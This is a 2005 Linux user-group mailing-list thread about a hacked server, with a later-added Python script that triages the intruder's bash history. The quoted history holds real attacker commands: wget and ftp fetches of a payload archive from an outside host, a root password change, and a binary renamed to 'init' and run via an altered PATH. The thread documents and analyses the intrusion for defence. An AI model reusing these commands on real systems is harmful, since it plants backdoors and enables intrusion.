[wellylug] Think I've had a server hacked

Cliff Pratt enkidu at cliffp.com
Thu Oct 27 09:16:16 NZDT 2005


Good luck. It's Wanadoo, one of the biggest sources of SPAM 
on my lists.

Cheers,

Cliff

Jamie Baddeley wrote:
> at the very least you should try this:
> 
> % Information related to '82.123.175.0 - 82.123.175.255'
> 
> inetnum:      82.123.175.0 - 82.123.175.255
> netname:      IP2000-ADSL-BAS
> descr:        BSTUI152 Tuileries Bloc2
> country:      FR
> admin-c:      WITR1-RIPE
> tech-c:       WITR1-RIPE
> status:       ASSIGNED PA
> remarks:      for hacking, spamming or security problems send mail to
> remarks:      postmaster at wanadoo.fr AND abuse at wanadoo.fr
> mnt-by:       FT-BRX
> source:       RIPE # Filtered
> 
> 
> send them mail. Yes,  82.123.175.245 may simply be a compromised jump
> point, but it costs nothing to let them know.
> 
> jamie
> 
> 
> 
> On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
> 
>>Hi
>>
>>I set up a box ages ago for a client - redhat 7.2/Mitel with only ssh port 
>>open
>>
>>root password just got changed and /var/log/auth deleted
>>last login from 82.123.175.245 (somewhere in europe - normally only 
>>connections from Lower Hutt :)
>>root bash history has..
>>w
>>passwd
>>uname -a
>>ps x
>>w
>>cd /var/tmp
>>ls
>>wget hash.idilis.ro/root.tar.gz
>>wget 217.156.85.3/root.tar.gz
>>fr hash.idilis.ro
>>ftp hash.idilis.ro
>>ftp 217.156.85.3
>>tar xzvf mech*
>>cd mech
>>mv bash init
>>PATH=:.PATH
>>init
>>init
>>init
>>
>>I am copying all the data off  (including /var/logs/) and will 
>>reinstall/update and shift ssh port
>>
>>is there anything else I can/should  do?
>>
>>cheers
>>
>>
>>Mark
>>
>>
>>
>>
>>
> 
> 
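A triage script for the kind of root bash history Mark quotes above, added here as an example (not code from the list or any poster). It flags the indicators the thread discusses (credential change, remote fetches, a shell renamed to `init`, `PATH` altered to search the current directory, execution of the disguised binary) and collects the hosts that were contacted, which is what an abuse report such as Jamie's needs. The history text is the one quoted in the thread, embedded as sample input.

```python
import re

# Sample input: the root bash history quoted in Mark's post, embedded for an offline run.
HISTORY = """\
w
passwd
uname -a
ps x
w
cd /var/tmp
ls
wget hash.idilis.ro/root.tar.gz
wget 217.156.85.3/root.tar.gz
fr hash.idilis.ro
ftp hash.idilis.ro
ftp 217.156.85.3
tar xzvf mech*
cd mech
mv bash init
PATH=:.PATH
init
init
init
"""

FETCH_TOOLS = {"wget", "curl", "ftp", "tftp", "scp", "fetch"}
# Names an intruder picks so the process blends into `ps` output (assumed list).
DISGUISE_NAMES = {"init", "sshd", "crond", "kernel", "httpd"}
HOST_RE = re.compile(r"^(?:[a-z]+://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,}|\d{1,3}(?:\.\d{1,3}){3})")

def triage_history(text):
    """Scan a bash history. Returns (findings, hosts): findings is a list of
    (line_no, reason, command); hosts is the set of remote hosts contacted."""
    findings, hosts, disguised = [], set(), set()
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.strip().split()
        if not parts:
            continue
        cmd, tool = " ".join(parts), parts[0]
        if tool in FETCH_TOOLS:
            hosts.update(m.group(1) for m in map(HOST_RE.match, parts[1:]) if m)
            findings.append((n, "remote fetch", cmd))
        elif tool == "passwd":
            findings.append((n, "credential change", cmd))
        elif tool == "mv" and len(parts) == 3 and parts[2] in DISGUISE_NAMES:
            disguised.add(parts[2])
            findings.append((n, "binary renamed to a system-process name", cmd))
        elif tool.startswith("PATH=") and re.search(r"(^|:)\.?(:|$)", tool[5:]):
            findings.append((n, "PATH altered to search the current directory", cmd))
        elif tool in disguised:
            findings.append((n, "disguised binary executed", cmd))
    return findings, hosts
```

Calling `triage_history(HISTORY)` flags ten of the nineteen commands and returns the two hosts (`hash.idilis.ro`, `217.156.85.3`) to include in an abuse report; running it against other hosts' histories extends the same check beyond this one incident.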
